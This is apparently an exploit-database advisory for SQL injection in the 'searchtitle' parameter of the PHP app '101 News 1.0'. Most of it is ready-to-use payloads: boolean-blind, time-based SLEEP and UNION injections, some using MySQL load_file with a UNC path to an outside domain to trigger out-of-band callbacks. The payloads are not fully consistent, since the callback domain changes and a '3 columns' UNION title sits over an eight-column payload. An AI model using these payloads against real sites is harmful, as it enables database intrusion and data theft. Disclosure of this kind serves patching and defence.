Exploits / Vulnerability Discovered : 2024-01-31 |
Type : webapps |
Platform : php
This exploit / vulnerability 101 news 1.0 multiplesqli is for educational purposes only and if it is used you will do on your own risk!
## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
[+]Payload:
```mysql
---
Parameter: searchtitle (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#